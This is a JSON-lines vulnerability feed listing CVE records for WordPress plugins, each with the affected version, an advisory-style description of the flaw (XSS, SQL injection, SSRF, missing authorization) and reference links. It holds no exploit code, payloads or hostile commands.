{"CVE_ID":"CVE-2024-13877","slug":"passbeemedia-web-push-notifications","versionImpact":"1.0.0","description":"The Passbeemedia Web Push Notification WordPress plugin through 1.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e8ce3cf-1598-4c5d-b119-99d5f676e619\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e8ce3cf-1598-4c5d-b119-99d5f676e619\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2541","slug":"wedevs-project-manager","versionImpact":"2.6.22","description":"The WP Project Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.6.22 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/tags\\\/2.6.20\\\/core\\\/WP\\\/Frontend.php#L209\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/tags\\\/2.6.20\\\/core\\\/WP\\\/Frontend.php#L209\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268509\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268509\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wedevs-project-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wedevs-project-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcc68b62-7dd1-47d4-bbc5-d0237b7c85e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcc68b62-7dd1-47d4-bbc5-d0237b7c85e7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4611","slug":"slim-seo","versionImpact":"4.5.3","description":"The Slim SEO \u2013 Fast & Automated WordPress SEO Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's slim_seo_breadcrumbs shortcode in all versions up to, and including, 4.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/elightup\\\/slim-seo\\\/commit\\\/b475dceff3a6bd94335d5a79eb12cdd92e2c8350\",\"name\":\"https:\\\/\\\/github.com\\\/elightup\\\/slim-seo\\\/commit\\\/b475dceff3a6bd94335d5a79eb12cdd92e2c8350\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slim-seo\\\/tags\\\/4.5.3\\\/src\\\/Breadcrumbs.php#L109\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slim-seo\\\/tags\\\/4.5.3\\\/src\\\/Breadcrumbs.php#L109\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slim-seo\\\/tags\\\/4.5.3\\\/src\\\/Breadcrumbs.php#L37\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slim-seo\\\/tags\\\/4.5.3\\\/src\\\/Breadcrumbs.php#L37\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slim-seo\\\/tags\\\/4.5.3\\\/src\\\/Breadcrumbs.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slim-seo\\\/tags\\\/4.5.3\\\/src\\\/Breadcrumbs.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3296099\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3296099\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slim-seo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slim-seo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6318a1cf-716f-450c-a1c2-497de8095daa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6318a1cf-716f-450c-a1c2-497de8095daa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5338","slug":"royal-elementor-addons","versionImpact":"1.7.1024","description":"The Royal Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.7.1024 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1022\\\/assets\\\/js\\\/frontend.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1022\\\/assets\\\/js\\\/frontend.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309082\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309082\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/royal-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/royal-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/201ff7b6-d72a-43c3-a7b1-c4f917c9d27f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/201ff7b6-d72a-43c3-a7b1-c4f917c9d27f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6380","slug":"onlyoffice","description":"The ONLYOFFICE Docs plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization within its oo.callback REST endpoint in versions 1.1.0 to 2.2.0. The plugin\u2019s permission callback only verifies that the supplied, encrypted attachment ID maps to an existing attachment post, but does not verify the requester\u2019s identity or capabilities. This makes it possible for unauthenticated attackers to log in as an arbitrary user.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/onlyoffice\\\/tags\\\/2.2.0\\\/public\\\/class-onlyoffice-plugin-public.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/onlyoffice\\\/tags\\\/2.2.0\\\/public\\\/class-onlyoffice-plugin-public.php#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/onlyoffice\\\/tags\\\/2.2.0\\\/public\\\/views\\\/class-onlyoffice-plugin-callback.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/onlyoffice\\\/tags\\\/2.2.0\\\/public\\\/views\\\/class-onlyoffice-plugin-callback.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/onlyoffice\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/onlyoffice\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/608b0506-074b-4df3-8c30-57cfb090f553?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/608b0506-074b-4df3-8c30-57cfb090f553?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28662","slug":"gift-voucher","versionImpact":"4.3.1","description":"The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2715","slug":"groundhogg","versionImpact":"2.7.9.8","description":"The Groundhogg plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'submit_ticket' function in versions up to, and including, 2.7.9.8. This makes it possible for authenticated attackers to create a support ticket that sends the website's data to the plugin developer, and it is also possible to create an admin access with an auto login link that is also sent to the plugin developer with the ticket. It only works if the plugin is activated with a valid license.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24747507-8f24-499e-a257-d379dc171e18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24747507-8f24-499e-a257-d379dc171e18?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/help\\\/help-page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/help\\\/help-page.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/help\\\/help-page.php#L220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/help\\\/help-page.php#L220\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1404","slug":"show-posts","versionImpact":"1.6","description":"The Weaver Show Posts Plugin for WordPress is vulnerable to stored Cross-Site Scripting due to insufficient escaping of the profile display name in versions up to, and including, 1.6. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/show-posts\\\/tags\\\/1.6\\\/includes\\\/atw-showposts-sc.php#L368\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/show-posts\\\/tags\\\/1.6\\\/includes\\\/atw-showposts-sc.php#L368\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8647c44-4879-4895-bd07-19f7d62a7326?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8647c44-4879-4895-bd07-19f7d62a7326?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1568","slug":"seraphinite-accelerator","versionImpact":"2.20.52","description":"The Seraphinite Accelerator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.20.52 via the OnAdminApi_HtmlCheck function. This makes it possible for authenticated attackers, with subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07287a85-df00-408a-8b02-978fd3116155?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07287a85-df00-408a-8b02-978fd3116155?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3040707\\\/seraphinite-accelerator\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3040707\\\/seraphinite-accelerator\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1080","slug":"beaver-builder-lite-version","versionImpact":"2.7.4.4","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the via the heading tag in all versions up to, and including, 2.7.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d62d3ca5-5795-46ef-ad8c-4474ff1e504e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d62d3ca5-5795-46ef-ad8c-4474ff1e504e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/modules\\\/heading\\\/includes\\\/frontend.php#L1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/modules\\\/heading\\\/includes\\\/frontend.php#L1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0910","slug":"restrict-for-elementor","versionImpact":"1.0.6","description":"The Restrict for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.6 due to improper restrictions on hidden data that make it accessible through the REST API. This makes it possible for unauthenticated attackers to extract potentially sensitive data from post content.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14993c04-7fe3-4c42-a605-2e431df14d79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14993c04-7fe3-4c42-a605-2e431df14d79?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/restrict-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/restrict-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7150","slug":"slider-wd","versionImpact":"1.2.57","description":"The Slider by 10Web \u2013 Responsive Image Slider plugin for WordPress is vulnerable to time-based SQL Injection via the 'id' parameter in all versions up to, and including, 1.2.57 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74d635b6-2b4a-49af-af5c-6bfa1b5d220e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74d635b6-2b4a-49af-af5c-6bfa1b5d220e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-wd\\\/tags\\\/1.2.57\\\/frontend\\\/models\\\/WDSModelSlider.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-wd\\\/tags\\\/1.2.57\\\/frontend\\\/models\\\/WDSModelSlider.php#L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slider-wd\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slider-wd\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131688\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131688\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6853","slug":"wp-multitasking","versionImpact":"0.1.12","description":"The WP MultiTasking  WordPress plugin through 0.1.12 does not have CSRF check when updating welcome popups, which could allow attackers to make logged admins perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1ce78c3-5d6c-465e-9ce8-6d92f7480333\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1ce78c3-5d6c-465e-9ce8-6d92f7480333\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9364","slug":"wp-sendgrid-mailer","versionImpact":"1.4","description":"The SendGrid for WordPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'wp_mailplus_clear_logs' function in all versions up to, and including, 1.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the plugin's log files.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb7d99a7-1e7d-43e1-839c-286b454c8276?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb7d99a7-1e7d-43e1-839c-286b454c8276?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-sendgrid-mailer\\\/tags\\\/1.4\\\/wp-sendgrid-mailer.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-sendgrid-mailer\\\/tags\\\/1.4\\\/wp-sendgrid-mailer.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-sendgrid-mailer\\\/trunk\\\/wp-sendgrid-mailer.php#L167\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-sendgrid-mailer\\\/trunk\\\/wp-sendgrid-mailer.php#L167\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11192","slug":"spotify-play-button-for-wordpress","versionImpact":"2.11","description":"The Spotify Play Button for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's spotifyplaybutton shortcode in all versions up to, and including, 2.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spotify-play-button-for-wordpress\\\/tags\\\/2.11\\\/sptify-play-button-for-wordpress.php#L137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spotify-play-button-for-wordpress\\\/tags\\\/2.11\\\/sptify-play-button-for-wordpress.php#L137\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spotify-play-button-for-wordpress\\\/tags\\\/2.11\\\/sptify-play-button-for-wordpress.php#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spotify-play-button-for-wordpress\\\/tags\\\/2.11\\\/sptify-play-button-for-wordpress.php#L147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fspotify-play-button-for-wordpress&old=3189556&new_path=%2Fspotify-play-button-for-wordpress&new=3191339&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fspotify-play-button-for-wordpress&old=3189556&new_path=%2Fspotify-play-button-for-wordpress&new=3191339&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/spotify-play-button-for-wordpress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/spotify-play-button-for-wordpress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a52e43dd-46b4-445b-b350-a2fd76315869?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a52e43dd-46b4-445b-b350-a2fd76315869?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13876","slug":"meintopf","versionImpact":"0.2.1","description":"The mEintopf WordPress plugin through 0.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d80cd18a-065f-443b-b548-d780b785d68e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d80cd18a-065f-443b-b548-d780b785d68e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2128","slug":"cost-calculator-builder","versionImpact":"3.2.67","description":"The Cost Calculator Builder plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018order_ids\u2019 parameter in all versions up to, and including, 3.2.67 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/includes\\\/classes\\\/models\\\/Payments.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/includes\\\/classes\\\/models\\\/Payments.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3263770\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3263770\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cost-calculator-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cost-calculator-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a7157c0-8378-4aa0-bc47-635be4ba2f8f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a7157c0-8378-4aa0-bc47-635be4ba2f8f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2248","slug":"wp-programmmanager","versionImpact":"1.2","description":"The WP-PManager WordPress plugin through 1.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b470a277-f5ad-49ff-97dd-4d3ee0269e5a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b470a277-f5ad-49ff-97dd-4d3ee0269e5a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4221","slug":"animated-buttons","versionImpact":"1.0.0","description":"The Animated Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'auto-downloader' shortcode in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/animated-buttons\\\/trunk\\\/Animated_Buttons.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/animated-buttons\\\/trunk\\\/Animated_Buttons.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e778399f-f7fe-47c5-9722-b833d78f475c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e778399f-f7fe-47c5-9722-b833d78f475c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6262","slug":"muse-ai","versionImpact":"0.4","description":"The muse.ai video embedding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's muse-ai shortcode in all versions up to, and including, 0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/muse-ai\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/muse-ai\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/790d6336-0c16-4058-9ddb-d182ef56263c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/790d6336-0c16-4058-9ddb-d182ef56263c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28661","slug":"wp-popup-banners","versionImpact":"1.2.5","description":"The WP Popup Banners WordPress Plugin, version <= 1.2.5, is affected by an authenticated SQL injection vulnerability in the 'value' parameter in the get_popup_data action.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2714","slug":"groundhogg","versionImpact":"2.7.9.8","description":"The Groundhogg plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'check_license' functions in versions up to, and including, 2.7.9.8. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to change the license key and support license key, but it can only be changed to a valid license key.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/help\\\/help-page.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/help\\\/help-page.php#L41\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29700844-b41d-4f10-90a7-06c8574d8d2a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29700844-b41d-4f10-90a7-06c8574d8d2a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/help\\\/help-page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/help\\\/help-page.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/guided-setup\\\/guided-setup.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/guided-setup\\\/guided-setup.php#L111\",\"refsource\":\"MISC\",\"tags\":[]}]"}
